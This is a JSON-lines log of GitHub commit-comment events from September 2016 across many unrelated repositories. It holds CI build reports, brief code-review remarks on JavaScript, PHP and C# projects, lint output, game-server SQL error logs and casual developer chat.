{"id":"4522127603","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18913450,"position":null,"line":null,"path":null,"commit_id":"f4b430d57611a180193fe8494e2317ab702e2645","created_at":"2016-09-06T15:42:27Z","updated_at":"2016-09-06T15:42:27Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-MacOS-10.9-clang: OK (2319 of 2327 tests passed, 24 test warnings)\n\n * 31 tests had: AUD diffs.\n * 4 tests had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 8 tests had: Table big diffs.\n * 15 tests had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f4b430d57611a180193fe8494e2317ab702e2645-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f4b430d57611a180193fe8494e2317ab702e2645-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T15:42:27Z"}
{"id":"4522131116","type":"CommitCommentEvent","actor":{"login":"KristineWolf"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18913464,"position":null,"line":null,"path":null,"commit_id":"c089d4145814fe27fec46b4940f2b724ecc425a6","created_at":"2016-09-06T15:43:02Z","updated_at":"2016-09-06T15:43:02Z","body":"des reicht schon "}},"created_at":"2016-09-06T15:43:02Z"}
{"id":"4522133086","type":"CommitCommentEvent","actor":{"login":"roman-drebotiy"},"repo":{"name":"AndriyIvaskevych/tick"},"payload":{"comment":{"id":18913470,"position":11,"line":265,"path":"assets/coffee/tick.coffee","commit_id":"698d8f55b920742501816aeeda35446fcc4b5ea8","created_at":"2016-09-06T15:43:22Z","updated_at":"2016-09-06T15:43:22Z","body":"it seems this check will skip initial rendering with 0 values"}},"created_at":"2016-09-06T15:43:22Z"}
{"id":"4522138820","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18913480,"position":null,"line":null,"path":null,"commit_id":"4b8c34e67d1dd44279b9049c628ddbd9e4aa4ac3","created_at":"2016-09-06T15:44:18Z","updated_at":"2016-09-06T15:44:18Z","body":"is it sure that moving \"form-group\" div doesn't brake the rendering?"}},"created_at":"2016-09-06T15:44:18Z"}
{"id":"4522141307","type":"CommitCommentEvent","actor":{"login":"kovidgoyal"},"repo":{"name":"atsepkov/RapydScript"},"payload":{"comment":{"id":18913484,"position":null,"line":null,"path":null,"commit_id":"570afe14bffe2604ffda0f1f21d46a92add5838d","created_at":"2016-09-06T15:44:41Z","updated_at":"2016-09-06T15:44:41Z","body":"I cant comment as to the typical object users will use len() on...dont have any data on that. But note that it is very common to stick stuff onto Object.prototype both in the ecmascript standards process and in third party JS libraries. \r\n\r\nWhen you do get around to supporting DOM containers, note that they suffer from the same problem as Arrays, namely that you instanceof fails on them across JS contexts. "}},"created_at":"2016-09-06T15:44:41Z"}
{"id":"4522162752","type":"CommitCommentEvent","actor":{"login":"redox"},"repo":{"name":"algolia/algoliasearch-wordpress"},"payload":{"comment":{"id":18913526,"position":null,"line":null,"path":null,"commit_id":"9387b1b3aa7f5eb2f7e18060664de86a14b0a525","created_at":"2016-09-06T15:48:16Z","updated_at":"2016-09-06T15:48:16Z","body":"@rayrutjes I assume you need to escape the `\"` from the values to be able to use it as an tag attribute."}},"created_at":"2016-09-06T15:48:16Z"}
{"id":"4522166256","type":"CommitCommentEvent","actor":{"login":"wolf-mtwo"},"repo":{"name":"sau-manich/NumeroCapicua"},"payload":{"comment":{"id":18913534,"position":null,"line":null,"path":null,"commit_id":"e5e685e2fb0ed61177a0ea311720a9ee872e6673","created_at":"2016-09-06T15:48:47Z","updated_at":"2016-09-06T15:48:47Z","body":"Usa clases!!! Usa clases!!! Usa clases!!! Usa clases!!! Usa clases!!!"}},"created_at":"2016-09-06T15:48:47Z"}
{"id":"4522170005","type":"CommitCommentEvent","actor":{"login":"wolf-mtwo"},"repo":{"name":"sau-manich/NumeroCapicua"},"payload":{"comment":{"id":18913543,"position":null,"line":null,"path":null,"commit_id":"e5e685e2fb0ed61177a0ea311720a9ee872e6673","created_at":"2016-09-06T15:49:24Z","updated_at":"2016-09-06T15:49:24Z","body":"Investiga sobre  \".gitignore\""}},"created_at":"2016-09-06T15:49:24Z"}
{"id":"4522170205","type":"CommitCommentEvent","actor":{"login":"jrhorn424"},"repo":{"name":"ga-wdi-boston/html-css-sass"},"payload":{"comment":{"id":18913545,"position":14,"line":156,"path":"README.md","commit_id":"48698e0d1139737ea667a9659fdab11b492b3a61","created_at":"2016-09-06T15:49:27Z","updated_at":"2016-09-06T15:49:27Z","body":"Not sure I like removing this. We ought to discuss semantics, but maybe not in this lesson?"}},"created_at":"2016-09-06T15:49:27Z"}
{"id":"4522170839","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"lodash/lodash.github.io"},"payload":{"comment":{"id":18913549,"position":null,"line":null,"path":null,"commit_id":"3b7663ff790eee74f3ac00fee613af3fcfc2f03e","created_at":"2016-09-06T15:49:32Z","updated_at":"2016-09-06T15:49:32Z","body":"Moved to https://github.com/lodash/lodash.github.io/commit/974b59dce7fc76d8c66d5bfd81bb6d79e02d7d16."}},"created_at":"2016-09-06T15:49:32Z"}
{"id":"4522174902","type":"CommitCommentEvent","actor":{"login":"wolf-mtwo"},"repo":{"name":"sau-manich/NumeroCapicua"},"payload":{"comment":{"id":18913560,"position":null,"line":null,"path":null,"commit_id":"e5e685e2fb0ed61177a0ea311720a9ee872e6673","created_at":"2016-09-06T15:50:14Z","updated_at":"2016-09-06T15:50:14Z","body":"https://gist.github.com/kmorcinek/2710267\r\n"}},"created_at":"2016-09-06T15:50:14Z"}
{"id":"4522176590","type":"CommitCommentEvent","actor":{"login":"astrofrog"},"repo":{"name":"conda-forge/staged-recipes"},"payload":{"comment":{"id":18913564,"position":16,"line":19,"path":"recipes/hyperion-fortran/run_test.sh","commit_id":"8a7fe0a0b2e69e4dc3d177c4e5d265d294b90ee0","created_at":"2016-09-06T15:50:29Z","updated_at":"2016-09-06T15:50:29Z","body":"Ok, will try and chime in :) Actually this runs fine, but the issue is that things hang when it comes to shutdown. I think this is just an issue with how CI services handle multiprocessing though, rather than a real issue."}},"created_at":"2016-09-06T15:50:29Z"}
{"id":"4522178372","type":"CommitCommentEvent","actor":{"login":"moezdhm"},"repo":{"name":"SayfEddineBZ/drupal8"},"payload":{"comment":{"id":18913569,"position":1,"line":1,"path":"sites/default/files/php/twig/d38d0668_field-multiple-value-form.html.twig_35a100dc9cd9711656c8d4e442a92cd2187e75d5e6429b343eb79dd260ff7883/.htaccess","commit_id":"126b1a48ab763c8b291024660b122cd53e3bfd44","created_at":"2016-09-06T15:50:45Z","updated_at":"2016-09-06T15:50:45Z","body":"Quels fichiers ici est lié à l'ajout de la taxonomy ?"}},"created_at":"2016-09-06T15:50:45Z"}
{"id":"4522182695","type":"CommitCommentEvent","actor":{"login":"aconanlai"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18913577,"position":null,"line":null,"path":null,"commit_id":"3017d47a2a452280ebf19f0bf870b5f8fb414f13","created_at":"2016-09-06T15:51:27Z","updated_at":"2016-09-06T15:51:27Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;1kDwMKxH&#x2F;20-ch-001b\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> CH-001b</a>"}},"created_at":"2016-09-06T15:51:27Z"}
{"id":"4522183294","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18913578,"position":null,"line":null,"path":null,"commit_id":"f3c27a540f1be965e2457faa8249d0e4f52653f4","created_at":"2016-09-06T15:51:32Z","updated_at":"2016-09-06T15:51:32Z","body":"just: a check should be done about how it behave with no-more-table (in phone screen mode)"}},"created_at":"2016-09-06T15:51:32Z"}
{"id":"4522187462","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18913587,"position":null,"line":null,"path":null,"commit_id":"f4b430d57611a180193fe8494e2317ab702e2645","created_at":"2016-09-06T15:52:15Z","updated_at":"2016-09-06T15:52:15Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1187 of 1187 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f4b430d57611a180193fe8494e2317ab702e2645-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f4b430d57611a180193fe8494e2317ab702e2645-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f4b430d57611a180193fe8494e2317ab702e2645-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.99%25-green.svg)</a>\n"}},"created_at":"2016-09-06T15:52:15Z"}
{"id":"4522188763","type":"CommitCommentEvent","actor":{"login":"trinitycorecode"},"repo":{"name":"ahuraa/WoWCircle434"},"payload":{"comment":{"id":18913593,"position":null,"line":null,"path":null,"commit_id":"e0950ef1e5536bdb99a9a6c0a52400498acb451b","created_at":"2016-09-06T15:52:26Z","updated_at":"2016-09-06T15:52:26Z","body":"In mysql_stmt_prepare() id: 16, sql: \"UPDATE creature_template SET faction_A = ?, faction_H = ? WHERE entry = ?\"\r\nUnknown column 'faction_A' in 'field list'\r\nIn mysql_stmt_prepare() id: 53, sql: \"INSERT INTO creature_transport (guid, npc_entry, transport_entry,  TransOffsetX, TransOffsetY, TransOffsetZ, TransOffsetO) values (?, ?, ?, ?, ?, ?, ?)\"\r\nTable 'world_434.creature_transport' doesn't exist\r\nIn mysql_stmt_prepare() id: 54, sql: \"UPDATE creature_transport SET emote = ? WHERE transport_entry = ? AND guid = ?\"\r\nTable 'world_434.creature_transport' doesn't exist\r\nIn mysql_stmt_prepare() id: 29, sql: \"SELECT point, position_x, position_y, position_z, orientation, move_flag, delay, action, action_chance FROM waypoint_data WHERE id = ? ORDER BY point\"\r\nUnknown column 'move_flag' in 'field list'\r\nIn mysql_stmt_prepare() id: 34, sql: \"SELECT id, point, delay, move_flag, action, action_chance FROM waypoint_data WHERE wpguid = ?\"\r\nUnknown column 'move_flag' in 'field list'\r\nIn mysql_stmt_prepare() id: 55, sql: \"SELECT name, security, help FROM command\"\r\n"}},"created_at":"2016-09-06T15:52:26Z"}
{"id":"4522189844","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18913596,"position":null,"line":null,"path":null,"commit_id":"e852cd432a5b921ab5eb936219bbe17162498585","created_at":"2016-09-06T15:52:36Z","updated_at":"2016-09-06T15:52:36Z","body":"MoreDayliteFollowup (JasonGlazer) - Win64-Windows-7-VisualStudio-12: OK (2325 of 2332 tests passed, 25 test warnings)\n\n * 32 tests had: AUD diffs.\n * 15 tests had: Table small diffs.\n * 3 tests had: EIO diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e852cd432a5b921ab5eb936219bbe17162498585-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e852cd432a5b921ab5eb936219bbe17162498585-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T15:52:36Z"}
{"id":"4522189848","type":"CommitCommentEvent","actor":{"login":"atsepkov"},"repo":{"name":"atsepkov/RapydScript"},"payload":{"comment":{"id":18913597,"position":null,"line":null,"path":null,"commit_id":"570afe14bffe2604ffda0f1f21d46a92add5838d","created_at":"2016-09-06T15:52:36Z","updated_at":"2016-09-06T15:52:36Z","body":"Good reminder, as my plan was to simply use something along the lines of `|| a.constructor === NodeList`. In the end, the multiple contexts issue is something I'll need to revisit later, perhaps with a compilation flag."}},"created_at":"2016-09-06T15:52:36Z"}
{"id":"4522190430","type":"CommitCommentEvent","actor":{"login":"jdubois"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":18913600,"position":5,"line":77,"path":"generators/entity/templates/src/test/gatling/simulations/_EntityGatlingTest.scala","commit_id":"4498bfd04025ecddef14438166c139fd6e27db5e","created_at":"2016-09-06T15:52:41Z","updated_at":"2016-09-06T15:52:41Z","body":"yes if you know what you do :-)\r\nRegex are horrible :-)"}},"created_at":"2016-09-06T15:52:41Z"}
{"id":"4522191136","type":"CommitCommentEvent","actor":{"login":"svladykin"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":18913603,"position":null,"line":null,"path":null,"commit_id":"5b8374a2a9ef74aaab5a9b156bceee30cc7bfb48","created_at":"2016-09-06T15:52:48Z","updated_at":"2016-09-06T15:52:48Z","body":"@grandinj @royrwood Please note that there is a system property `SysProperties.serializeJavaObject` which tells to avoid serialization for Java objects.  If it is set to `false` it is preferable to do `getObject()` right away instead of `JdbcUtils.deserialize(getBytesNoCopy(),...`. Probably it makes sense to add a method `JdbcUtils.getObject(ValueJavaObject)` which will handle this and use this method for `GEOMETRY` type as well."}},"created_at":"2016-09-06T15:52:48Z"}
{"id":"4522193389","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18913608,"position":null,"line":null,"path":null,"commit_id":"4b8c34e67d1dd44279b9049c628ddbd9e4aa4ac3","created_at":"2016-09-06T15:53:12Z","updated_at":"2016-09-06T15:53:12Z","body":"This part are iupdated again after (removing empty label and using li (LIST with comment)"}},"created_at":"2016-09-06T15:53:12Z"}
{"id":"4522193717","type":"CommitCommentEvent","actor":{"login":"Viper2k4"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":18913609,"position":null,"line":null,"path":null,"commit_id":"d89b00fecdadeb4130f5243dc42ca21037857c17","created_at":"2016-09-06T15:53:15Z","updated_at":"2016-09-06T15:53:15Z","body":"This leads to an exception with old configs. Because the config-file read in wrong lines. (Because the one missing line)"}},"created_at":"2016-09-06T15:53:15Z"}
{"id":"4522200095","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18913619,"position":null,"line":null,"path":null,"commit_id":"53c863d053a8235e482ba13d1ee5617bb0adafa3","created_at":"2016-09-06T15:54:18Z","updated_at":"2016-09-06T15:54:18Z","body":"Dude, slow the heck down!"}},"created_at":"2016-09-06T15:54:18Z"}
{"id":"4522201543","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18913620,"position":null,"line":null,"path":null,"commit_id":"111fda15ae8e41b7a757eafabd1ce8c6b84c0efe","created_at":"2016-09-06T15:54:32Z","updated_at":"2016-09-06T15:54:32Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 932](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12754&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-06T15:54:32Z"}
{"id":"4522204486","type":"CommitCommentEvent","actor":{"login":"wolf-mtwo"},"repo":{"name":"sau-manich/NumeroCapicua"},"payload":{"comment":{"id":18913625,"position":26,"line":26,"path":"numeros capicua/numeros capicua/Program.cs","commit_id":"e5e685e2fb0ed61177a0ea311720a9ee872e6673","created_at":"2016-09-06T15:55:01Z","updated_at":"2016-09-06T15:55:01Z","body":"int value = Data.read(\"put some value to verify if it's capicua\");\r\nCapicua.isCavicua(101);\r\nCapicua.revert(101);\r\nData.show(\"The number  {0}  is capicua\");"}},"created_at":"2016-09-06T15:55:01Z"}
{"id":"4522206724","type":"CommitCommentEvent","actor":{"login":"ndechesne"},"repo":{"name":"cpriouzeau/meta-st-cannes2"},"payload":{"comment":{"id":18913634,"position":null,"line":null,"path":null,"commit_id":"e0e9cfbb4c05b95b4bf3f733528d912c79636253","created_at":"2016-09-06T15:55:22Z","updated_at":"2016-09-06T15:55:22Z","body":"i think you updated the krogoth branch, while the manifest uses jethro.\n\nOn Tue, Sep 6, 2016 at 5:40 PM, cpriouzeau <notifications@github.com> wrote:\n\n> I have updated the krogoth branch to be compliant with multi BSP config.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/cpriouzeau/meta-st-cannes2/commit/e0e9cfbb4c05b95b4bf3f733528d912c79636253#commitcomment-18913413>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAFwv0lvlxk1eVpzcp19w4xGk2DputZuks5qnYlQgaJpZM4J1sbe>\n> .\n>\n"}},"created_at":"2016-09-06T15:55:22Z"}
{"id":"4522214426","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18913645,"position":null,"line":null,"path":null,"commit_id":"4b8c34e67d1dd44279b9049c628ddbd9e4aa4ac3","created_at":"2016-09-06T15:56:33Z","updated_at":"2016-09-06T15:56:33Z","body":"ok, but what about the  \r\n\r\n`<div class=\"form-group\">`\r\n\r\nIt has been removed, and the class has been moved to the parent div. Is there any reason? Does it brake anything? "}},"created_at":"2016-09-06T15:56:33Z"}
{"id":"4522215053","type":"CommitCommentEvent","actor":{"login":"odzb"},"repo":{"name":"WebReflection/url-search-params"},"payload":{"comment":{"id":18913647,"position":null,"line":null,"path":null,"commit_id":"df50ab50aff8a7d10914f167f5a363dd96cec7ef","created_at":"2016-09-06T15:56:39Z","updated_at":"2016-09-06T15:56:39Z","body":"Thanks a lot!"}},"created_at":"2016-09-06T15:56:39Z"}
{"id":"4522216975","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18913653,"position":null,"line":null,"path":null,"commit_id":"660a4b9aec39f339a123f18480d378322c40c01d","created_at":"2016-09-06T15:56:58Z","updated_at":"2016-09-06T15:56:58Z","body":"IT COMPILES (last commit I checked)"}},"created_at":"2016-09-06T15:56:58Z"}
{"id":"4522219430","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":18913657,"position":null,"line":null,"path":null,"commit_id":"5ee05ef6669a1cdd43e9fc149ec12be1da4268cf","created_at":"2016-09-06T15:57:22Z","updated_at":"2016-09-06T15:57:22Z","body":"[tests/testthat/test-ranges.R:252:23:](https://github.com/jackwasey/icd/blob/5ee05ef6669a1cdd43e9fc149ec12be1da4268cf/tests/testthat/test-ranges.R#L252) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  expect_equal_no_icd((\"042\" %i9s% \"042\")[1], \"042\")\n                      ^\n```"}},"created_at":"2016-09-06T15:57:22Z"}
{"id":"4522223078","type":"CommitCommentEvent","actor":{"login":"dsblank"},"repo":{"name":"hchasestevens/show_ast"},"payload":{"comment":{"id":18913659,"position":null,"line":null,"path":null,"commit_id":"fbc073cdf9bb95a9b56220c7558ad30853138ae4","created_at":"2016-09-06T15:57:57Z","updated_at":"2016-09-06T15:57:57Z","body":"Looking very nice! Even better quality than the PIL-based version---very clean."}},"created_at":"2016-09-06T15:57:57Z"}
{"id":"4522223479","type":"CommitCommentEvent","actor":{"login":"namapane"},"repo":{"name":"CJLST/ZZAnalysis"},"payload":{"comment":{"id":18913660,"position":5,"line":25,"path":"checkout_80X.csh","commit_id":"30f86c42f96e420c50f827019e6884111e953cf6","created_at":"2016-09-06T15:58:01Z","updated_at":"2016-09-06T15:58:01Z","body":"Hi Philipp, \r\nDo I understand correctly that we have been using the corrections derived with 4fb in our ICHEP results, and this fix picks the latest? In any case, can we pick the current tag  (ICHEP2016_v2) and not the HEAD, so that we have a reproducible recipe?"}},"created_at":"2016-09-06T15:58:01Z"}
{"id":"4522225924","type":"CommitCommentEvent","actor":{"login":"reefdog"},"repo":{"name":"documentcloud/documentcloud"},"payload":{"comment":{"id":18913664,"position":null,"line":null,"path":null,"commit_id":"395116a2f9ccbd1a0b44c3c5b64fdd95680f805e","created_at":"2016-09-06T15:58:23Z","updated_at":"2016-09-06T15:58:23Z","body":"I do feel this is my most substantive contribution yet."}},"created_at":"2016-09-06T15:58:23Z"}
{"id":"4522225991","type":"CommitCommentEvent","actor":{"login":"dagar"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":18913665,"position":null,"line":null,"path":null,"commit_id":"9c7518dd0f975cef8acbd09fe974daec2e8300e9","created_at":"2016-09-06T15:58:23Z","updated_at":"2016-09-06T15:58:23Z","body":"@AndreasAntener I had some other geofence fixes on my todo list, I think this is partially broken. Have you tested the rest, like moving the sticks to escape the triggered failsafe?\r\nhttps://github.com/dagar/Firmware/commit/b10f02c31daa6db0f5ac63c5826cc804e373cbb7\r\n"}},"created_at":"2016-09-06T15:58:23Z"}
{"id":"4522227778","type":"CommitCommentEvent","actor":{"login":"knowtheory"},"repo":{"name":"documentcloud/documentcloud"},"payload":{"comment":{"id":18913670,"position":5,"line":50,"path":"app/views/home/_sidebar.html.erb","commit_id":"395116a2f9ccbd1a0b44c3c5b64fdd95680f805e","created_at":"2016-09-06T15:58:41Z","updated_at":"2016-09-06T15:58:41Z","body":"🌎🌍🌏🌎🌍🌏"}},"created_at":"2016-09-06T15:58:41Z"}
{"id":"4522228930","type":"CommitCommentEvent","actor":{"login":"knowtheory"},"repo":{"name":"documentcloud/documentcloud"},"payload":{"comment":{"id":18913673,"position":null,"line":null,"path":null,"commit_id":"395116a2f9ccbd1a0b44c3c5b64fdd95680f805e","created_at":"2016-09-06T15:58:52Z","updated_at":"2016-09-06T15:58:52Z","body":"😱"}},"created_at":"2016-09-06T15:58:52Z"}
{"id":"4522233539","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18913687,"position":null,"line":null,"path":null,"commit_id":"3d0957e17e1f2e3e024fe4deb440564700f20d20","created_at":"2016-09-06T15:59:38Z","updated_at":"2016-09-06T15:59:38Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/416/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-06T15:59:38Z"}
{"id":"4522243951","type":"CommitCommentEvent","actor":{"login":"reefdog"},"repo":{"name":"documentcloud/documentcloud"},"payload":{"comment":{"id":18913718,"position":5,"line":50,"path":"app/views/home/_sidebar.html.erb","commit_id":"395116a2f9ccbd1a0b44c3c5b64fdd95680f805e","created_at":"2016-09-06T16:01:22Z","updated_at":"2016-09-06T16:01:22Z","body":"![dpatwbbhq](https://cloud.githubusercontent.com/assets/4731/18281110/3bf0ad58-7421-11e6-8120-e0ca0e3a1d4a.gif)"}},"created_at":"2016-09-06T16:01:22Z"}
{"id":"4522249732","type":"CommitCommentEvent","actor":{"login":"TheOfficialFloW"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":18913734,"position":null,"line":null,"path":null,"commit_id":"bd739abab4eeda619a6309a26fecc46b049cb0ef","created_at":"2016-09-06T16:02:18Z","updated_at":"2016-09-06T16:02:18Z","body":"@soywiz as we are not using the progressbar dialog for vpk promoting, it's not needed to use install_thread for our purpose. Instead, I've written a small installPackage function that will do the same thing."}},"created_at":"2016-09-06T16:02:18Z"}
{"id":"4522253181","type":"CommitCommentEvent","actor":{"login":"TheBlueMatt"},"repo":{"name":"TheBlueMatt/bips"},"payload":{"comment":{"id":18913742,"position":9,"line":114,"path":"bip-0152.mediawiki","commit_id":"7059fd119f779cd87c4c44fa16ff98e080be5181","created_at":"2016-09-06T16:02:51Z","updated_at":"2016-09-06T16:02:51Z","body":"Oops, yea, should have the \"novel version\" text here, too, probably."}},"created_at":"2016-09-06T16:02:51Z"}
{"id":"4522253573","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18913743,"position":null,"line":null,"path":null,"commit_id":"111fda15ae8e41b7a757eafabd1ce8c6b84c0efe","created_at":"2016-09-06T16:02:55Z","updated_at":"2016-09-06T16:02:55Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 932](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12754&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:24"}},"created_at":"2016-09-06T16:02:55Z"}
{"id":"4522256835","type":"CommitCommentEvent","actor":{"login":"haecker-felix"},"repo":{"name":"haecker-felix/gradio"},"payload":{"comment":{"id":18913750,"position":null,"line":null,"path":null,"commit_id":"304761ca07a1df027ece18c3e51d79d06f4141ec","created_at":"2016-09-06T16:03:29Z","updated_at":"2016-09-06T16:03:29Z","body":"Sorry for delayed answer. I'm actually a bit busy to develope for gradio. \r\n\r\n Yeah i'm planning to make a new \"ImageProvider\" class for gradio(4.1) soon. Your way of getting the icon for the notifications will be included in this class. "}},"created_at":"2016-09-06T16:03:29Z"}
{"id":"4522257237","type":"CommitCommentEvent","actor":{"login":"OstapL"},"repo":{"name":"OstapL/gfwhitelabels"},"payload":{"comment":{"id":18913752,"position":null,"line":null,"path":null,"commit_id":"6c78c56fe31e35163871c2cf31c47a8b41b02083","created_at":"2016-09-06T16:03:32Z","updated_at":"2016-09-06T16:03:32Z","body":"added a new unit , respectively, changes in design\r\nchange width block  Type of Security "}},"created_at":"2016-09-06T16:03:32Z"}
{"id":"4522264621","type":"CommitCommentEvent","actor":{"login":"dallaswinger"},"repo":{"name":"aopp/android_packages_apps_SetupWizard"},"payload":{"comment":{"id":18913770,"position":null,"line":null,"path":null,"commit_id":"e2d866509ae090a6fced84472fabf90f28058898","created_at":"2016-09-06T16:04:49Z","updated_at":"2016-09-06T16:04:49Z","body":"Identified a bug earlier where the user leaves the fragment and comes back and we've lost all control over the UI via broadcasts. I believe this is because of a stale reference to the fragment in the receiver onResume; Testing the fix now.\r\n\r\nIf I hadn't put a null check in onReceive it would have exploded throwing an exception instead of not responding. (an explosion would have been far less terrifying than this strange behavior) "}},"created_at":"2016-09-06T16:04:49Z"}
{"id":"4522265803","type":"CommitCommentEvent","actor":{"login":"lizarusi"},"repo":{"name":"lizarusi/react-native-scrollable-tab-view"},"payload":{"comment":{"id":18913772,"position":36,"line":143,"path":"index.js","commit_id":"22bcd0004168e2de62de5ac5c5713d4ac2c462e7","created_at":"2016-09-06T16:05:01Z","updated_at":"2016-09-06T16:05:01Z","body":"Cool, scroll as before, I don't understand why there used ViewPagerAndroid instead of ScrollView."}},"created_at":"2016-09-06T16:05:01Z"}
{"id":"4522273890","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18913793,"position":null,"line":null,"path":null,"commit_id":"a1d1d64edf71ffc33d57c6e60a4eca297ffaa3e8","created_at":"2016-09-06T16:06:24Z","updated_at":"2016-09-06T16:06:24Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/417/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-06T16:06:24Z"}
{"id":"4522274801","type":"CommitCommentEvent","actor":{"login":"soywiz"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":18913797,"position":null,"line":null,"path":null,"commit_id":"bd739abab4eeda619a6309a26fecc46b049cb0ef","created_at":"2016-09-06T16:06:33Z","updated_at":"2016-09-06T16:06:33Z","body":"@TheOfficialFloW 👍 \r\nI didn't wanted to duplicate code, but maybe the functionality is small enough, and the logic switching too complex just for that."}},"created_at":"2016-09-06T16:06:33Z"}
{"id":"4522281936","type":"CommitCommentEvent","actor":{"login":"lucbettaieb"},"repo":{"name":"hacsoc/blognotifier"},"payload":{"comment":{"id":18913809,"position":null,"line":null,"path":null,"commit_id":"683448740d6ffde2bd7f20da40d64ccf83675141","created_at":"2016-09-06T16:07:47Z","updated_at":"2016-09-06T16:07:47Z","body":"My b.  Yeah I killed it since I don't do a blog anymore.  Sorry for goofing up the stuff."}},"created_at":"2016-09-06T16:07:47Z"}
